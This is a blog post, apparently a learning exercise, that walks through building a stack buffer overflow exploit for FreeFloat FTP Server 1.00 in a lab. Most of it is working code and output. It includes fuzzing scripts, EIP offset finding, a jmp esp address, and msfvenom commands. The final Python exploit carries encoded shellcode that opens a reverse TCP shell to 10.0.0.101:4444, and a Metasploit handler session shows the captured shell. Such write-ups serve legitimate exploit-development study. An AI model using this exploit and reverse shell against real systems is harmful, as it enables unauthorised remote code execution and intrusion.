Before we get started, I must state clearly that this information is based on the guidance provided from fuzzysecurity.com website as shown in the references section.
For some folks reading my material may be easier, for others reading the material from Fuzzy Security will be easier. Whichever you choose, please note that this is all based on the guidance provided by those folks and thus nothing here is my original work.
Now that the attribution stuff is out of the way, let's get going.
Like the blog I'm using the vulnerable app FreeFloat FTP Server (Version 1.00)
The claim is the app is vulnerable, so the first thing to figure out is where it crashed.
Using the Python code below we can test the vulnerability with the first 1000 bytes
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | import socket junk_data = "A" * 10000 def exploit_code(): # setup network connection mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) myConnection = mySocket.connect(('10.0.0.50',21)) # make connection via FTP mySocket.recv(1024) mySocket.send('USER anonymous\r\n') mySocket.recv(1023) mySocket.send('PASS securitynik@securitynik.local\r\n') mySocket.recv(1024) mySocket.send('MKD ' + junk_data + '\r\n') mySocket.recv(1024) mySocket.send('QUIT\r\n') mySocket.close() if __name__ == '__main__': exploit_code() |
After starting up the FTP server and attaching immunity debugger to it, then sending the above code we get:
From what we can see above, the program crashed and we can see our "A"s are part of both the ESP and EDI Registers.
Looking at the stack, we also see "A"s are there.
In trying to determine whether the ESP or EDI has more of the As, I first look at the memory area and calculated where the "A"s start for ESP and where it ends. I then look where the "A"s started for EDI and where does it end.
Finding the size of ESP we see:
00B3FF0C - 00B3FC2C = 2E0 (736)
Finding the size of EDI we see:
003B1BFB - 003B1AFB = 100 (256)
From above we an see ESP has the most space for our exploit code. Let's now look at this to see how we can maximize the ESP
Next up is time for us to find our return return pointer so that we can overwrite it and ultimately point to our exploited code which we will place on the stack.
To find this pattern, let's leverage Metasploit's "pattern_create.rb"
./pattern_create.rb --length 1000
Taking the pattern and modifying the script we now have:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | import socket junk_data = "A" * 1000 def exploit_code(): # Pattern shellcode = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B' # setup network connection mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) myConnection = mySocket.connect(('10.0.0.50',21)) # make connection via FTP mySocket.recv(1024) mySocket.send('USER anonymous\r\n') mySocket.recv(1023) mySocket.send('PASS securitynik@securitynik.local\r\n') mySocket.recv(1024) mySocket.send('MKD ' + shellcode + '\r\n') mySocket.recv(1024) mySocket.send('QUIT\r\n') mySocket.close() if __name__ == '__main__': exploit_code() |
Once again we attach Immunity to the FTP Server and send the above code. This produces the following:
Looking at the EIP register above, we see the pattern "69413269". In considering endianess, more specifically, little endian, this multi-byte value needs to be reorder to be "69324169" which is "i2Ai" in ASCII.
When the value "i2Ai" is passed back to Metasploit's "pattern_offset.rb", we get:
./pattern_offset.rb --query i2Ai
[*] Exact match at offset 247
Looks like it takes 247 bytes to get to our EIP. Let's seek Immunity's mona.py plugin help to verify this. We will leverage mona's "findmsp" to look for the Metasploit's pattern.
Looking at the "findmsp" output we see:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | ================================================================================ Output generated by mona.py v2.0, rev 577 - Immunity Debugger Corelan Team - https://www.corelan.be ================================================================================ OS : xp, release 5.1.2600 Process being debugged : FTPServer (pid 544) Current mona arguments: findmsp ================================================================================ 2018-01-10 00:34:09 ================================================================================ ........ < truncated for brevity > ............ [+] Looking for cyclic pattern in memory Cyclic pattern (normal) found at 0x00b3fb29 (length 1000 bytes) Cyclic pattern (normal) found at 0x003b16f9 (length 1000 bytes) EIP contains normal pattern : 0x69413269 (offset 247) ESP (0x00b3fc2c) points at offset 259 in normal pattern (length 741) EDI (0x003b1afb) points at offset 743 in normal pattern (length 257) ........ < truncated for brevity > ............ |
So we see Mona also reports that our pattern 0x69413269 is at offset 247
Let's now rework our code to verify we can overwrite the EIP pointer with our own value.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | import socket junk_data = "A" * 1000 def exploit_code(): # Pattern shellcode = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B' # setup network connection mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) myConnection = mySocket.connect(('10.0.0.50',21)) # make connection via FTP mySocket.recv(1024) mySocket.send('USER anonymous\r\n') mySocket.recv(1023) mySocket.send('PASS securitynik@securitynik.local\r\n') mySocket.recv(1024) mySocket.send('MKD ' + 'A'*247 + 'BBBB' + 'C'*749 + '\r\n') mySocket.recv(1024) mySocket.send('QUIT\r\n') mySocket.close() if __name__ == '__main__': exploit_code() |
When the code is sent to the FTP Server, we see the following in Immunity
Now its time for us to find a way to "jmp" to the ESP register.
Leveraging Mona once again. This time we use her "jmp -r esp" option. This will search for points which will allow us to jmp to the stack.
Picking on the first address "7C9D30D7", do remember this value is Little Endian. As a result, we need to change the byte order to "d7309d7c".
Modifying the code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | import socket junk_data = "A" * 1000 def exploit_code(): # Pattern shellcode = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B' # setup network connection mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) myConnection = mySocket.connect(('10.0.0.50',21)) # make connection via FTP mySocket.recv(1024) mySocket.send('USER anonymous\r\n') mySocket.recv(1023) mySocket.send('PASS securitynik@securitynik.local\r\n') mySocket.recv(1024) mySocket.send('MKD ' + 'A'*247 + '\xd7\x30\x9d\x7c' + 'C'*749 + '\r\n') mySocket.recv(1024) mySocket.send('QUIT\r\n') mySocket.close() if __name__ == '__main__': exploit_code() |
Similar to Fuzzy Security's recommendation, I added a breakpoint at the address "7C9D30D7" which points to "jmp esp" then initiate communication again with the FTP server, we get the following:
As we can see above, our EIP points to the "jmp esp" which basically sends out to the stack.
Time to put our shellcode on the stack.
first up, let's leverage Metasploit's MSFVenom to generate our payload for launching "calc.exe". If this works, then we can look at gaining access via shell.
1 | msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D' --format c --iterations 1 |
Putting our generated shellcode into our script we get:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 | import socket junk_data = "A" * 1000 def exploit_code(): # Shellcode to launch calc.exe shellcode = ( "\xb8\xfa\x7b\xe6\xc9\xda\xdf\xd9\x74\x24\xf4\x5b\x33\xc9\xb1" "\x31\x31\x43\x13\x03\x43\x13\x83\xc3\xfe\x99\x13\x35\x16\xdf" "\xdc\xc6\xe6\x80\x55\x23\xd7\x80\x02\x27\x47\x31\x40\x65\x6b" "\xba\x04\x9e\xf8\xce\x80\x91\x49\x64\xf7\x9c\x4a\xd5\xcb\xbf" "\xc8\x24\x18\x60\xf1\xe6\x6d\x61\x36\x1a\x9f\x33\xef\x50\x32" "\xa4\x84\x2d\x8f\x4f\xd6\xa0\x97\xac\xae\xc3\xb6\x62\xa5\x9d" "\x18\x84\x6a\x96\x10\x9e\x6f\x93\xeb\x15\x5b\x6f\xea\xff\x92" "\x90\x41\x3e\x1b\x63\x9b\x06\x9b\x9c\xee\x7e\xd8\x21\xe9\x44" "\xa3\xfd\x7c\x5f\x03\x75\x26\xbb\xb2\x5a\xb1\x48\xb8\x17\xb5" "\x17\xdc\xa6\x1a\x2c\xd8\x23\x9d\xe3\x69\x77\xba\x27\x32\x23" "\xa3\x7e\x9e\x82\xdc\x61\x41\x7a\x79\xe9\x6f\x6f\xf0\xb0\xe5" "\x6e\x86\xce\x4b\x70\x98\xd0\xfb\x19\xa9\x5b\x94\x5e\x36\x8e" "\xd1\x91\x7c\x93\x73\x3a\xd9\x41\xc6\x27\xda\xbf\x04\x5e\x59" "\x4a\xf4\xa5\x41\x3f\xf1\xe2\xc5\xd3\x8b\x7b\xa0\xd3\x38\x7b" "\xe1\xb7\xdf\xef\x69\x16\x7a\x88\x08\x66") exploitCode = '\x90' * 20 + shellcode # setup network connection mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) myConnection = mySocket.connect(('10.0.0.50',21)) # make connection via FTP mySocket.recv(1024) mySocket.send('USER anonymous\r\n') mySocket.recv(1023) mySocket.send('PASS securitynik@securitynik.local\r\n') mySocket.recv(1024) mySocket.send('MKD ' + 'A'*247 + '\xd7\x30\x9d\x7c' + exploitCode + 'C'*(749-len(exploitCode)) + '\r\n') mySocket.recv(1024) mySocket.send('QUIT\r\n') mySocket.close() if __name__ == '__main__': exploit_code() |
Looking at the tasks running before executing our script we see:
1 2 | C:\>tasklist | findstr "FTPServer" & tasklist | findstr "calc.exe" FTPServer.exe 1984 Console 0 2,296 K |
Once our script is executed we get:
1 2 3 | C:\>tasklist | findstr "FTPServer" & tasklist | findstr "calc.exe" FTPServer.exe 124 Console 0 2,292 K calc.exe 560 Console 0 2,560 K |
Now that we know we were able to execute "calc.exe", time to gain access via a shell and finalizing our code.
Leveraging Metasploit MSFVenom again to setup a reverse tcp shell connection to our Metasploit handler.:
1 | msfvenom --platform Windows --arch x86 --payload windows/shell/reverse_tcp LHOST=10.0.0.101 LPORT=4444 --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D' --format c --iterations 1 |
After adding the shellcode to our script, our final script now look like:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 | """ This code is part of me learning exploit development in a Windows Environment Author: Nik Alleyne Author Blog: http://securitynik.blogspot.com Date: 2018-01-10 Exploit For: FloatFTPServer ver 1.00 """ import socket def exploit_code(): # The msfvenom output below was used to generate the shellcode used to establish the reverse_tcp shell # msfvenom --platform Windows --arch x86 --payload windows/shell/reverse_tcp LHOST=10.0.0.101 LPORT=4444 --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D' --format c --iterations 1 shellcode = ( "\xd9\xc0\xbd\x72\x6e\xfd\x3f\xd9\x74\x24\xf4\x58\x29\xc9\xb1" "\x47\x83\xc0\x04\x31\x68\x14\x03\x68\x66\x8c\x08\xc3\x6e\xd2" "\xf3\x3c\x6e\xb3\x7a\xd9\x5f\xf3\x19\xa9\xcf\xc3\x6a\xff\xe3" "\xa8\x3f\x14\x70\xdc\x97\x1b\x31\x6b\xce\x12\xc2\xc0\x32\x34" "\x40\x1b\x67\x96\x79\xd4\x7a\xd7\xbe\x09\x76\x85\x17\x45\x25" "\x3a\x1c\x13\xf6\xb1\x6e\xb5\x7e\x25\x26\xb4\xaf\xf8\x3d\xef" "\x6f\xfa\x92\x9b\x39\xe4\xf7\xa6\xf0\x9f\xc3\x5d\x03\x76\x1a" "\x9d\xa8\xb7\x93\x6c\xb0\xf0\x13\x8f\xc7\x08\x60\x32\xd0\xce" "\x1b\xe8\x55\xd5\xbb\x7b\xcd\x31\x3a\xaf\x88\xb2\x30\x04\xde" "\x9d\x54\x9b\x33\x96\x60\x10\xb2\x79\xe1\x62\x91\x5d\xaa\x31" "\xb8\xc4\x16\x97\xc5\x17\xf9\x48\x60\x53\x17\x9c\x19\x3e\x7f" "\x51\x10\xc1\x7f\xfd\x23\xb2\x4d\xa2\x9f\x5c\xfd\x2b\x06\x9a" "\x02\x06\xfe\x34\xfd\xa9\xff\x1d\x39\xfd\xaf\x35\xe8\x7e\x24" "\xc6\x15\xab\xd1\xcc\x81\x5e\x26\xd1\x34\x37\x24\xd1\xa7\x9b" "\xa1\x37\x97\x73\xe2\xe7\x57\x24\x42\x58\x3f\x2e\x4d\x87\x5f" "\x51\x87\xa0\xf5\xbe\x7e\x98\x61\x26\xdb\x52\x10\xa7\xf1\x1e" "\x12\x23\xf6\xdf\xdc\xc4\x73\xcc\x88\x24\xce\xae\x1e\x3a\xe4" "\xc5\x9e\xae\x03\x4c\xc9\x46\x0e\xa9\x3d\xc9\xf1\x9c\x36\xc0" "\x67\x5f\x20\x2d\x68\x5f\xb0\x7b\xe2\x5f\xd8\xdb\x56\x0c\xfd" "\x23\x43\x20\xae\xb1\x6c\x11\x03\x11\x05\x9f\x7a\x55\x8a\x60" "\xa9\x67\xf6\xb6\x97\x1d\x16\x0b") # variable for the exploide code exploitCode = '\x90' * 20 + shellcode # setup network socket connection to connect to the FTP server mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) myConnection = mySocket.connect(('10.0.0.50',21)) # make connection via FTP mySocket.recv(1024) # send login information - username anonymous mySocket.send('USER anonymous\r\n') # receive the resonse mySocket.recv(1023) # send the password - securitynik@securitynik.local mySocket.send('PASS securitynik@securitynik.local\r\n') # receive the response mySocket.recv(1024) # create a large directory and overflow the buffer mySocket.send('MKD ' + 'A'*247 + '\xd7\x30\x9d\x7c' + exploitCode + 'C'*(749-len(exploitCode)) + '\r\n') # receive the response mySocket.recv(1024) # Quit the FTP session mySocket.send('QUIT\r\n') # Close the socket connection mySocket.close() if __name__ == '__main__': exploit_code() |
Setup the msfhandler to accept our incoming connection once the exploit is successful:
1 2 3 4 5 6 7 8 9 10 | msf exploit(multi/handler) > use exploit/multi/handler msf exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(multi/handler) > set LHOST 10.0.0.101 LHOST => 10.0.0.101 msf exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf exploit(multi/handler) > run [*] Started reverse TCP handler on 10.0.0.101:4444 |
Once the multi handler has been created, we then execute our script again to make connection with the FTP Server and we get .... Voila a shell ....
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.0.0.50 [*] Command shell session 3 opened (10.0.0.101:4444 -> 10.0.0.50:1035) at 2018-01-11 00:43:04 -0500 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\SecurityNik\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is D86F-1D13 Directory of C:\Documents and Settings\SecurityNik\Desktop 01/08/2018 01:35 AM <DIR> . 01/08/2018 01:35 AM <DIR> .. 01/04/2018 02:58 AM 745 Easy RM to MP3 Converter.lnk 04/29/2004 05:16 PM 57,344 FTPServer.exe 12/31/2017 10:26 PM 859 WinDbg (2).lnk 3 File(s) 58,948 bytes 2 Dir(s) 8,639,336,448 bytes free C:\Documents and Settings\SecurityNik\Desktop> |
We can also see the network connection confirming our connectivity
1 2 3 4 5 6 7 8 9 10 | Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 124 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 992 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 10.0.0.50:21 10.0.0.1:56388 ESTABLISHED 124 TCP 10.0.0.50:139 0.0.0.0:0 LISTENING 4 TCP 10.0.0.50:1035 10.0.0.101:4444 ESTABLISHED 124 TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING 1876 |
We can also further confirm connectivity as a result of looking at the Metasploit sessions:
1 2 3 4 5 6 7 8 | msf exploit(multi/handler) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 3 shell x86/windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Cor... 10.0.0.101:4444 -> 10.0.0.50:1035 (10.0.0.50) |
At this point we can conclude this was a successful exercise and thus can close off this post.
References:
https://www.fuzzysecurity.com/tutorials/expDev/2.html
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit
No comments:
Post a Comment